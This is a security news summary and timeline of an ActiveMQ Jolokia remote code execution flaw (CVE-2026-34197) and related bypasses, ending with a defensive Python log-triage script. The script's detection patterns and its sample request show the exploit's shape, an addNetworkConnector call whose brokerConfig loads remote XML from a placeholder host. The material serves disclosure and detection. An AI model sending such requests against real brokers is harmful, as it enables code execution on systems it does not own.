Apache ActiveMQ Jolokia MBean Flaw Enables Authenticated RCE
Apache disclosed CVE-2026-34197, an important-severity remote code execution flaw in Apache ActiveMQ Broker and Apache ActiveMQ Classic that lets authenticated users execute code through the Jolokia JMX-HTTP bridge exposed at /api/jolokia/. The default Jolokia access policy permits exec operations on ActiveMQ MBeans, allowing attackers to call methods such as BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String) with a crafted discovery URI.
The exploit abuses the VM transport brokerConfig parameter to load a remote Spring XML application context via ResourceXmlApplicationContext. Spring may instantiate singleton beans before ActiveMQ validates the configuration, enabling arbitrary code execution in the broker JVM, including through methods like Runtime.exec(). Apache said the issue affects versions before 5.19.4 in the 5.x line and versions from 6.0.0 up to, but not including, 6.2.3 in the 6.x line, and recommends upgrading to 5.19.5 or 6.2.3. The vulnerability was reported by Naveen Sunkavally of Horizon3.ai.
How this story unfolded
9 events from the most recent confirmed update back to the earliest known activity.
Apache discloses CVE-2026-41044 in ActiveMQ Jolokia DestinationView MBean
Apache disclosed CVE-2026-41044, an important-severity authenticated remote code execution flaw in Apache ActiveMQ, Apache ActiveMQ Broker, and Apache ActiveMQ All. The issue lets an authenticated attacker craft a malicious broker name through the admin console and abuse the DestinationView MBean exposed by Jolokia to load a remote Spring XML context; Apache said affected versions should be upgraded to 5.19.6 or 6.2.5.
Apache discloses CVE-2026-40466 as bypass of ActiveMQ Jolokia RCE fix
Apache disclosed CVE-2026-40466, an important-severity vulnerability that can bypass the CVE-2026-34197 fix in Apache ActiveMQ when the activemq-http module is present. The flaw lets an authenticated attacker use HTTP Discovery transport to reach a malicious endpoint that returns a VM URI and ultimately load a remote Spring XML context for code execution; Apache advised upgrading to versions 5.19.6 or 6.2.5.
Shadowserver says 6,400 exposed ActiveMQ servers remain vulnerable
Shadowserver reported that more than 6,400 internet-exposed Apache ActiveMQ servers were still vulnerable to CVE-2026-34197 amid ongoing exploitation. It said the largest concentrations of exposed systems were in Asia, North America, and Europe, highlighting the scale of potential exposure.
CISA orders federal agencies to patch ActiveMQ flaw by April 30
After adding CVE-2026-34197 to the KEV catalog, CISA directed Federal Civilian Executive Branch agencies to remediate the Apache ActiveMQ vulnerability under Binding Operational Directive 22-01. The deadline for federal agencies to apply fixes or mitigations was set for 2026-04-30.
CISA adds ActiveMQ CVE-2026-34197 to KEV amid active exploitation
CISA added CVE-2026-34197 to its Known Exploited Vulnerabilities catalog and warned that the Apache ActiveMQ flaw is being actively exploited in the wild. The update elevated the issue from a disclosed and analyzed vulnerability to one with confirmed real-world exploitation.
Horizon3.ai publishes exploit details for ActiveMQ Jolokia RCE
Horizon3.ai released technical analysis of CVE-2026-34197, explaining exploitation via Jolokia's addNetworkConnector(String) to load a remote Spring XML file through vm:// and brokerConfig URLs. The post also noted that on ActiveMQ 6.0.0 through 6.1.1, chaining with CVE-2024-32114 can make the flaw effectively unauthenticated, and provided defender monitoring guidance for suspicious vm:// and brokerConfig=xbean:http activity.
Apache publishes remediation guidance for affected ActiveMQ versions
Apache stated the issue affects versions before 5.19.4 in the 5.x line and versions from 6.0.0 up to, but not including, 6.2.3 in the 6.x line. It advised users to upgrade to versions 5.19.5 or 6.2.3 to remediate the vulnerability.
Apache discloses CVE-2026-34197 affecting ActiveMQ Broker and Classic
Apache disclosed an important-severity vulnerability, CVE-2026-34197, in Apache ActiveMQ Broker and Apache ActiveMQ Classic. The flaw allows authenticated users to achieve code execution via Jolokia JMX-HTTP operations such as BrokerService.addNetworkConnector(String) and addConnector(String).
Horizon3.ai researcher reports ActiveMQ Jolokia RCE to Apache
Apache said CVE-2026-34197 was reported by Naveen Sunkavally of Horizon3.ai. The report concerned an authenticated remote code execution path through Jolokia-exposed ActiveMQ MBeans.
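One way to triage broker HTTP logs for the indicators named in the summary and in the Horizon3.ai entry above: Jolokia exec calls to addNetworkConnector or addConnector whose arguments carry vm:// or brokerConfig=xbean:http. This is an added example, not code from Apache or Horizon3.ai; the record layout (request path plus body), the verdict labels and the sample values are assumptions constructed for illustration.

```python
import json
import re
from urllib.parse import unquote

# Operation names and argument markers taken from this page (CVE-2026-34197).
RISKY_OPS = {"addnetworkconnector", "addconnector"}
ARG_MARKERS = (re.compile(r"vm://", re.I),
               re.compile(r"brokerconfig\s*=\s*xbean:http", re.I))
GET_EXEC = re.compile(r"/api/jolokia/exec/[^/]+/([^/?]+)/?(.*)", re.I)  # exec/<mbean>/<op>/<args>

def _decode(text, rounds=3):
    """Percent-decode repeatedly so double-encoded values still match."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def _exec_calls(path, body):
    """Yield (operation, argument_text) for every exec call in one request."""
    try:
        parsed = json.loads(body) if body else []
    except ValueError:
        parsed = []
    for item in (parsed if isinstance(parsed, list) else [parsed]):  # bulk = JSON array
        if isinstance(item, dict) and str(item.get("type", "")).lower() == "exec":
            yield str(item.get("operation", "")), json.dumps(item.get("arguments", []))
    match = GET_EXEC.search(path)
    if match:
        yield match.groups()

def classify(path, body=""):
    """'high': risky operation with a marker; 'review': risky operation; else None."""
    verdict = None
    for op, args in _exec_calls(path, body):
        # Jolokia accepts "op(signature)"; compare on the bare operation name.
        if _decode(op).split("(")[0].strip().lower() not in RISKY_OPS:
            continue
        text = _decode(args).replace("!/", "/")  # "!/" is Jolokia's path escape for "/"
        if any(marker.search(text) for marker in ARG_MARKERS):
            return "high"
        verdict = "review"
    return verdict

if __name__ == "__main__":
    # Constructed sample, not captured traffic; host.invalid is a placeholder.
    body = json.dumps({"type": "exec", "operation": "addNetworkConnector",
                       "arguments": ["vm://x?brokerConfig=xbean:http://host.invalid/c.xml"]})
    print(classify("/api/jolokia/", body))
```

A "review" verdict marks any runtime connector change made through Jolokia, which is worth correlating with change records even when no marker is present.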



